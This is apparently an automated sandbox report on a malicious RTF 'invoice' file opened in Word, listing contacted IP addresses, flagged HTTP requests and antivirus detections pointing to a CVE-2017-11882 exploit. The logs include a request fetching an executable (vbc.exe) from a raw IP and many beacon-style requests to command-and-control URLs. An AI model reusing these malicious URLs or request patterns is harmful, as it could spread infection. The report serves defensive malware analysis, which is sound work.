Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Oct. 20, 2021, 11:05 a.m. | Oct. 20, 2021, 11:07 a.m. |
-
WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\inv_1_____-233000030000.wbk
2496
IP Address | Status | Action |
---|---|---|
103.224.212.222 | Active | Moloch |
108.186.180.79 | Active | Moloch |
154.208.173.145 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.104.153.244 | Active | Moloch |
173.212.200.118 | Active | Moloch |
185.28.21.80 | Active | Moloch |
192.249.80.207 | Active | Moloch |
192.254.189.87 | Active | Moloch |
192.3.110.172 | Active | Moloch |
202.165.66.108 | Active | Moloch |
34.102.136.180 | Active | Moloch |
45.156.25.115 | Active | Moloch |
64.190.62.111 | Active | Moloch |
Suricata Alerts
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://192.3.110.172/00880088/vbc.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.normandia.pro/mxnu/?bj=kHN/hbjK4OzLmo333toUUHv3cKFKy5bivtfKIua2AYmutZDuFn6HD/HyblDUos2+bUTS6mEe&Rx=8pdDoFr0ubqhlt | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.mortgagerates.solutions/mxnu/?bj=e40TMWWr6xWVnQ1HwCqLobeJF4L/Z7xCu7/MTKlaRXTCRzwsua34O9neh9w9TPhFkJc6vnSR&Rx=8pdDoFr0ubqhlt | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.naplesconciergerealty.com/mxnu/?bj=hecv2sMFcvsyFIpzJOhZbtwMh1SG6St5/U1aPglBFWownzq2qPNpvMi/ho6Sg43JWpVw027R&Rx=8pdDoFr0ubqhlt | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.desongli.com/mxnu/?bj=hZ80obWBB1Dtx9mJDJ/B6KhSbXm9N4IXZ9kDZpitpQpTEQWdqR+8a/o3g7qjE+O8VqYt5r7Y&Rx=8pdDoFr0ubqhlt | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.ingdalynnia.xyz/mxnu/?bj=pfZfepvuuXd3YdzLhx74JhtQE2ZsQUx19b2XlYunhcRs71ErzSq2ECWFO+pn1SXrM1L87AtC&Rx=8pdDoFr0ubqhlt | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.technichoffghosts.com/mxnu/?bj=/Fzie1hELeLn7MgSxS1T5SAjvZfamumVbzPuvONP0wKdG4fvdY2IoYOIDGhEOLvFBokHwHx6&Rx=8pdDoFr0ubqhlt | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.funkidsroomdecor.com/mxnu/?bj=iFpbfMx0kR1NhQJhtaFPfzg8Nsy3dm+jXQd2Fi3YicbHa3sz/htfiB2IN3yla1aALZWfkU50&Rx=8pdDoFr0ubqhlt | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.whitebot.xyz/mxnu/?bj=mJKlLoR4AxZK/RYIFKAo0UiVtoPyzBJ6SQAFXLfvSOBYEGo1cqGoAX7CRK1QxANrckFntybM&Rx=8pdDoFr0ubqhlt | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.gold2guide.art/mxnu/?bj=nooUTxpgyHI8Tmjtx/bEFedfCsCgFivtiLIHJ+Ou+u0gXSqijcRRlL1sEAr9C8C8DV1gd2HK&Rx=8pdDoFr0ubqhlt | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.tbrhc.com/mxnu/?bj=dBbPwQ2utUd0Fk1uS+XSFkxz2YTUNCneFR1VLIh1vAwAXkSpHWWkzNznjyqcoekG5m5H1qts&Rx=8pdDoFr0ubqhlt | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.sattaking-gaziabad.xyz/mxnu/?bj=UvUEtIev0LW0Fj9rimgEuaxF8o8Q3PSD9GE10acJUnczNTSiUTsn1kpqflxWWG28G9vjgVED&Rx=8pdDoFr0ubqhlt | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.265411.com/mxnu/?bj=25s1ERxOA1FsQEL58dsMzLXIm6T2LEHWrovGfnVbwWX5qUTqFcrkTCI5ju9rUaWf+2K12S96&Rx=8pdDoFr0ubqhlt |
request | GET http://192.3.110.172/00880088/vbc.exe |
request | GET http://www.normandia.pro/mxnu/?bj=kHN/hbjK4OzLmo333toUUHv3cKFKy5bivtfKIua2AYmutZDuFn6HD/HyblDUos2+bUTS6mEe&Rx=8pdDoFr0ubqhlt |
request | GET http://www.mortgagerates.solutions/mxnu/?bj=e40TMWWr6xWVnQ1HwCqLobeJF4L/Z7xCu7/MTKlaRXTCRzwsua34O9neh9w9TPhFkJc6vnSR&Rx=8pdDoFr0ubqhlt |
request | GET http://www.naplesconciergerealty.com/mxnu/?bj=hecv2sMFcvsyFIpzJOhZbtwMh1SG6St5/U1aPglBFWownzq2qPNpvMi/ho6Sg43JWpVw027R&Rx=8pdDoFr0ubqhlt |
request | GET http://www.desongli.com/mxnu/?bj=hZ80obWBB1Dtx9mJDJ/B6KhSbXm9N4IXZ9kDZpitpQpTEQWdqR+8a/o3g7qjE+O8VqYt5r7Y&Rx=8pdDoFr0ubqhlt |
request | GET http://www.ingdalynnia.xyz/mxnu/?bj=pfZfepvuuXd3YdzLhx74JhtQE2ZsQUx19b2XlYunhcRs71ErzSq2ECWFO+pn1SXrM1L87AtC&Rx=8pdDoFr0ubqhlt |
request | GET http://www.technichoffghosts.com/mxnu/?bj=/Fzie1hELeLn7MgSxS1T5SAjvZfamumVbzPuvONP0wKdG4fvdY2IoYOIDGhEOLvFBokHwHx6&Rx=8pdDoFr0ubqhlt |
request | GET http://www.funkidsroomdecor.com/mxnu/?bj=iFpbfMx0kR1NhQJhtaFPfzg8Nsy3dm+jXQd2Fi3YicbHa3sz/htfiB2IN3yla1aALZWfkU50&Rx=8pdDoFr0ubqhlt |
request | GET http://www.whitebot.xyz/mxnu/?bj=mJKlLoR4AxZK/RYIFKAo0UiVtoPyzBJ6SQAFXLfvSOBYEGo1cqGoAX7CRK1QxANrckFntybM&Rx=8pdDoFr0ubqhlt |
request | GET http://www.gold2guide.art/mxnu/?bj=nooUTxpgyHI8Tmjtx/bEFedfCsCgFivtiLIHJ+Ou+u0gXSqijcRRlL1sEAr9C8C8DV1gd2HK&Rx=8pdDoFr0ubqhlt |
request | GET http://www.tbrhc.com/mxnu/?bj=dBbPwQ2utUd0Fk1uS+XSFkxz2YTUNCneFR1VLIh1vAwAXkSpHWWkzNznjyqcoekG5m5H1qts&Rx=8pdDoFr0ubqhlt |
request | GET http://www.sattaking-gaziabad.xyz/mxnu/?bj=UvUEtIev0LW0Fj9rimgEuaxF8o8Q3PSD9GE10acJUnczNTSiUTsn1kpqflxWWG28G9vjgVED&Rx=8pdDoFr0ubqhlt |
request | GET http://www.265411.com/mxnu/?bj=25s1ERxOA1FsQEL58dsMzLXIm6T2LEHWrovGfnVbwWX5qUTqFcrkTCI5ju9rUaWf+2K12S96&Rx=8pdDoFr0ubqhlt |
filetype_details | Rich Text Format data, unknown version | filename | inv_1_____-233000030000.wbk |
host | 192.3.110.172 |
DrWeb | Exploit.Rtf.Obfuscated.96 |
MicroWorld-eScan | Exploit.RTF-ObfsStrm.Gen |
FireEye | Exploit.RTF-ObfsStrm.Gen |
McAfee | Exploit-CVE2017-11882.z |
Sangfor | Malware.Generic-RTF.Save.c5a892ae |
K7AntiVirus | Trojan ( 0057b3a91 ) |
K7GW | Trojan ( 0057b3a91 ) |
Arcabit | Exploit.RTF-ObfsStrm.Gen |
Cyren | RTF/CVE-2017-11882.R.gen!Camelot |
Symantec | Bloodhound.RTF.20 |
ESET-NOD32 | a variant of DOC/Abnormal.B |
Kaspersky | HEUR:Exploit.MSOffice.Generic |
BitDefender | Exploit.RTF-ObfsStrm.Gen |
NANO-Antivirus | Exploit.Rtf.Heuristic-rtf.dinbqn |
Ad-Aware | Exploit.RTF-ObfsStrm.Gen |
Sophos | Troj/RtfExp-EQ |
TrendMicro | HEUR_RTFMALFORM |
McAfee-GW-Edition | Exploit-CVE2017-11882.z |
Emsisoft | Exploit.RTF-ObfsStrm.Gen (B) |
Ikarus | Exploit.CVE-2017-11882 |
Avira | HEUR/Rtf.Malformed |
Antiy-AVL | Trojan[Exploit]/RTF.Obscure.Gen |
ZoneAlarm | HEUR:Exploit.MSOffice.Generic |
GData | Exploit.RTF-ObfsStrm.Gen |
AhnLab-V3 | RTF/Malform-A.Gen |
MAX | malware (ai score=83) |
Fortinet | RTF/GenericKD.47107450!tr |